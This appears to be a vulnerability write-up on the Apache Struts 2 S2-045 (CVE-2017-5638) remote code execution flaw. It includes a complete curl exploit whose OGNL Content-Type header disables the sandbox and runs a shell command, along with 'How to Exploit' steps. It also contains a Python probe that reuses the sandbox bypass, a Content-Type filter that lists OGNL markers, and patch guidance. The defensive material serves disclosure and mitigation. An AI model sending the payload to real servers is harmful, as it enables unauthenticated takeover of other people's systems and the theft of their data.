Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)


The CVE-2017-5638 vulnerability (Apache advisory S2-045) in Apache Struts 2 stems from flawed error handling in the Jakarta Multipart parser, the default file-upload parser. Struts hands a request to this parser whenever the Content-Type header contains the string multipart/form-data. If the header is otherwise malformed, the parser rejects it and Struts builds an error message that embeds the raw header value; that message is passed through the framework's text-localization routine, which evaluates Object-Graph Navigation Language (OGNL) expressions such as %{...} embedded in it. OGNL is a powerful expression language integrated into Struts that can call Java methods and reach the application's context. An attacker therefore only needs to craft a Content-Type header containing an OGNL expression: because nothing sanitizes the header before the error message is rendered, the expression is evaluated on the server with the privileges of the Java process running the application. No valid multipart body and no authentication are required, and any action served by a vulnerable Struts 2 deployment is reachable, so this yields unauthenticated remote code execution and complete control over the vulnerable server.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

Date: 2017-03-07

Patch: Struts 2.3.32 and 2.5.10.1, released 2017-03-07

What Undercode Say:

`curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://vulnerable-target/upload.action`

The first part of the expression disables the OGNL sandbox (it swaps in the permissive DEFAULT_MEMBER_ACCESS and, on 2.3.x, clears the excluded-class and excluded-package lists); the rest builds a ProcessBuilder for the chosen command and copies its output straight into the HTTP response body. The target URL is a placeholder: any Struts action on the host works, and a plain GET without a body is enough.

How to Exploit:

Craft an HTTP request whose Content-Type header contains multipart/form-data followed by an OGNL expression wrapped in %{...}; no request body and no credentials are needed.

Send it to any action of a Struts 2 application that uses the default Jakarta multipart parser.

The parser rejects the malformed header, Struts embeds the header in the error message, and the OGNL expression inside it is evaluated server-side.

The expression spawns a process and streams its output into the HTTP response, giving arbitrary command execution as the application user.
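The following is an added example, not code from the original post or from the Struts project: a Python checker that reuses the sandbox-bypass prefix of the exploit above but replaces the command execution with a call that adds a response header whose value is an arithmetic product computed by OGNL on the server. A reflected or echoed header could only contain the expression text, never the product, so a match is strong evidence of evaluation without running a command on the target. The header name X-Struts-Check, the probe numbers and the target URL are arbitrary choices of this example, and it assumes nothing between you and the application strips unknown response headers.

```python
"""Non-destructive check for CVE-2017-5638 (Struts S2-045).

Added example; it is not the page's exploit nor Struts project code.
Only stdlib is used so it runs anywhere.
"""
import sys
import urllib.error
import urllib.request

# Arithmetic the server-side OGNL evaluator must compute. A proxy or WAF that
# merely echoes request data cannot produce the product.
PROBE_A, PROBE_B = 29, 1321
EXPECTED = str(PROBE_A * PROBE_B)          # "38309"
MARKER_HEADER = "X-Struts-Check"          # arbitrary name chosen for this example

# Same sandbox bypass as the public exploit (swap in DEFAULT_MEMBER_ACCESS and,
# on 2.3.x, clear the excluded class/package lists); only the tail differs.
_SANDBOX_BYPASS = (
    "(#_='multipart/form-data')."
    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#_memberAccess?(#_memberAccess=#dm):("
    "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    "(#ognlUtil.getExcludedPackageNames().clear())."
    "(#ognlUtil.getExcludedClasses().clear())."
    "(#context.setMemberAccess(#dm))))"
)


def build_probe_header() -> str:
    """Content-Type value that trips the Jakarta parser and makes Struts
    evaluate the OGNL embedded in the resulting error message."""
    tail = (
        "(#rs=@org.apache.struts2.ServletActionContext@getResponse())."
        f"(#rs.addHeader('{MARKER_HEADER}',{PROBE_A}*{PROBE_B}))"
    )
    return "%{" + _SANDBOX_BYPASS + "." + tail + "}"


def is_vulnerable(response_headers) -> bool:
    """True only when the marker header carries the server-computed product.

    Accepts any mapping of header name -> value; names are compared
    case-insensitively because not every source normalises them.
    """
    for name, value in response_headers.items():
        if name.lower() == MARKER_HEADER.lower():
            return value.strip() == EXPECTED
    return False


def check(url: str, timeout: float = 10.0) -> bool:
    """Send one GET (no body needed) with the probe header and inspect the reply."""
    req = urllib.request.Request(url, headers={"Content-Type": build_probe_header()})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return is_vulnerable(dict(resp.headers.items()))
    except urllib.error.HTTPError as err:
        # A 4xx/5xx is common after the parser error; the header was already
        # added to the response object before the status was decided.
        return is_vulnerable(dict(err.headers.items()))


if __name__ == "__main__":
    # Placeholder target; pass the real action URL as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://vulnerable-target/upload.action"
    print("VULNERABLE" if check(target) else "no OGNL evaluation observed")
```

Run it as `python3 s2045_check.py http://host/some.action`. A negative result only means the probe was not evaluated in a way that reached the client; a patched host, a filter that rejects the header, or a proxy that drops the marker header all look the same from outside, so treat "no evaluation observed" as inconclusive rather than as proof of a patch.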

Protection from this CVE

Upgrade to Struts 2.3.32 or 2.5.10.1 (or later) immediately; this is the only complete fix.

If an upgrade cannot be rolled out at once, deploy a servlet filter in front of the application that rejects any request whose Content-Type header mentions multipart/form-data but is not a well-formed multipart media type (the interim workaround given in Apache advisory S2-045). Header filtering alone is not sufficient: the same CVE was later shown to be reachable through a crafted Content-Disposition filename inside the multipart body (advisory S2-046), which a Content-Type check never sees.

Using a different multipart parser than the Jakarta implementation reduces exposure only if the replacement does not render raw client input into error messages the same way; verify that before relying on it.
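The check such a filter performs, written as an added example in Python so it can run against constructed sample headers (it is not Struts project code and not a drop-in servlet filter). It applies the rule from the interim workaround above: a Content-Type that mentions multipart/form-data must be exactly that media type plus well-formed parameters, and any OGNL syntax is rejected outright. The sample header values below are constructed for this example.

```python
"""Content-Type validation mirroring the S2-045 interim filter (added example)."""
import re

# A legitimate multipart upload: the media type followed only by
# name=value parameters (quoted or token), e.g. the boundary.
_MULTIPART_OK = re.compile(
    r'^multipart/form-data(\s*;\s*[A-Za-z0-9_-]+=("[^"]*"|[^;\s]+))*\s*$',
    re.IGNORECASE,
)

# OGNL expression syntax never appears in a legitimate Content-Type.
# "(" is deliberately not listed: RFC 2046 allows it inside a boundary.
_OGNL_MARKERS = ("%{", "${", "#", "@")


def content_type_is_suspicious(value):
    """Return True for anything the filter should reject before the
    Jakarta parser (and its OGNL-evaluating error path) sees it."""
    if value is None:
        return False                      # no header: nothing to evaluate
    v = value.strip()
    if any(marker in v for marker in _OGNL_MARKERS):
        return True
    # The vulnerable dispatcher picks the multipart parser when the header
    # merely *contains* multipart/form-data, so require it to be well-formed.
    if "multipart/form-data" in v.lower() and not _MULTIPART_OK.match(v):
        return True
    return False


# Constructed samples: two legitimate uploads, one ordinary JSON request,
# one S2-045 probe (the exploit header, shortened) and one type-smuggling
# attempt that hides the magic string inside a parameter.
SAMPLE_HEADERS = [
    'multipart/form-data; boundary="----WebKitFormBoundary7MA4YWxkTrZu0gW"',
    "multipart/form-data;boundary=----abc(1)",
    "application/json",
    "%{(#_='multipart/form-data').(#cmd='whoami')}",
    "text/plain; x=multipart/form-data",
]


def triage(values):
    """Classify each header value as the filter would: 'allow' or 'reject'."""
    return [("reject" if content_type_is_suspicious(v) else "allow") for v in values]


if __name__ == "__main__":
    for value, verdict in zip(SAMPLE_HEADERS, triage(SAMPLE_HEADERS)):
        print(f"{verdict:6s}  {value[:60]}")
```

The same logic ported to a javax.servlet Filter and mapped before the Struts dispatcher reproduces the S2-045 workaround; keep the reject path a plain 400 response with a static message, since the whole bug is an error message that renders attacker input.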

Impact:

Full system compromise.

Data theft.

Service disruption.

Arbitrary code execution.


Sources:

Reported By: nvd.nist.gov
